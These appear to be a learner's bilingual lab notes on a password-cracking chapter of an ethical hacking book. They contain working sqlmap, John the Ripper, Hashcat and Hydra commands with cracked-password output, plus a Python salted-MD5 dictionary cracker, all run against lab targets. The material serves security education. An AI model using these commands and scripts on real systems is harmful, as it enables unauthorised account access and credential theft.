Ethical.Hacking.2021.10：STEALING AND CRACKING PASSWORDS

Understanding HTTP Requests

---

Using SQLMap
与书中不一致，--sqlmap-shell已经不用了，改为--shell了，如下：

sudo sqlmap -u "http://192.168.1.102/mutillidae/index.php?page=user-info.php&username=&password=&" --shell

注意-u 后面的url要用“”括起来

--banner 枚举dbms类型

---

Sec Lists, an excellent collection of security lists, contains several password lists that you can use for your dictionary-based attacks. 

You can clone the Sec Lists Git repository to your Kali Linux
desktop by running the following command:
 

git clone https://github.com/danielmiessler/SecLists

---

The Anatomy of the MD5 Hash(解剖MD5)

The MD5 hash function operates on 512-bit blocks. The first 448
bits of this block contain the message that is being hashed, and the
last 64 bits are the message’s length. 

Even after all this mixing, in 1993, Antoon Bosselaers and Bert
den Boer discovered that MD5 doesn’t meet the no-collision property
of hashes, because it’s possible to generate two messages with the
same hash. Because of this, the MD5 algorithm is no longer secure
and shouldn’t be used when building cryptographic systems. Not to
worry: other hash algorithms such as SHA-256, SHA-512, and SHA-
3 are still considered secure. 

Cracking Hashes

write our own hash cracking tool

myHashCracker.py 

import hashlib

def crack_MD5_Hash(hash_to_crack, salt, dictionary_file):
    file=open(dictionary_file,"r")
    for password in file:
        salted_password=(salt+password.strip("\n")).encode("UTF-8")
        if hashlib.md5(salted_password).hexdigest()==hash_to_crack:
            return password
    return None

hash_to_crack = 'c94201dbba5cb49dc3a6876a04f15f75'
salt = 'd6a6bc0db10694a2d90e3a69648f3a03'
dict='darkweb2017-top10000.txt'

password=crack_MD5_Hash(hash_to_crack,salt,dict)
print(password)

---

Popular Hash Cracking and Brute-Forcing Tools

John the Ripper

sudo john --format=raw-sha256 --wordlist=/home/kali/SecLists-master/Passwords/Leaked-Databases/000webhost.txt hashes.txt 
[sudo] kali 的密码：
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA256 [SHA256 256/256 AVX2 8x])
Warning: poor OpenMP scalability for this hash type, consider --fork=4
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
pleasetrustno1   (?)
1g 0:00:00:00 DONE (2021-12-20 21:54) 50.00g/s 6553Kp/s 6553Kc/s 6553KC/s z0m0rg..sekretariat147
Use the "--show --format=Raw-SHA256" options to display all of the cracked passwords reliably
Session completed

sudo john --format=raw-sha256 --show hashes.txt 
?:pleasetrustno1

1 password hash cracked, 0 left

---

Hashcat

running Hashcat in a virtual machine may result in an illegal instruction error

use Hashcat to crack the hashes.txt file:

hashcat -a 0 -m 1400 hashes.txt ~/SecLists-master/Passwords/darkweb2017-top10000.txt

The -a flag represents the attack mode, or strategy, used to crack the hash. 

 To reduce the number of combinations Hashcat must test, you
can supply a mask. A mask is a pattern that defines the password’s
structure. For example, the pattern ?u?l?l?d?s specifies a five-letter
password. The ?u indicates that the password starts with an
uppercase letter. This uppercase letter is followed by two lowercase
letters (?l) and the pattern ends with a digit (?d) followed by a symbol
(?s). As a result, this mask might test the password Bas5!.

The -m (or mode) option represents the algorithm used to create the hash. 

---

Hydra

use the default usernames and passwords in the ftpbetterdefaultpasslist.txt list, which is a part of SecLists

hydra -C ~/SecLists-master/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt 10.10.10.17 ftp
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-12-20 22:25:20
[DATA] max 16 tasks per 1 server, overall 16 tasks, 66 login tries, ~5 tries per task
[DATA] attacking ftp://10.10.10.17:21/
[21][ftp] host: 10.10.10.17   login: ftp   password: b1uRR3
[21][ftp] host: 10.10.10.17   login: anonymous   password: anonymous
[21][ftp] host: 10.10.10.17   login: ftp   password: ftp
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-12-20 22:25:34

hydra -L seclists/Usernames/top-usernames-shortlist.txt -P seclists/Passwords/darkweb2017-top10000.txt 10.10.10.17 http-get-form "/mutillidae/index.php?page=user-info.php&:username=^USER^&password=^PASS^&:Error:Bad usename or password"

Hydra uses colons to separate options. 

Use the (^USER^) and (^PASS^) placeholders to indicate where Hydra should insert the username and password in the URL.